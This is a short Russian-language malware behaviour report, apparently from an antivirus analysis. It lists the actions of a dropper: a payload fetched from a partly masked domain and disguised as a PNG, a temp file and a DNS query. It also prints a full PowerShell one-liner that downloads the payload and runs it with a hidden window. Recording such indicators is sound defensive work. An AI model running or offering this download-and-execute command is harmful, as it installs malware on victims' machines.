Техническая информация
- http://an####oluggage.com/skin/install/not16.png как %temp%\sefym.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://an####oluggage.com/skin/install/not16.png','%TMP%\Sefym.exe');Start-Process '%TMP%\Sefym.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\1171333.cvr
- DNS ASK an####oluggage.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://an####oluggage.com/skin/install/not16.png','%TMP%\Sefym.exe');Start-Process '%TMP%\Sefym.exe';' (со скрытым окном)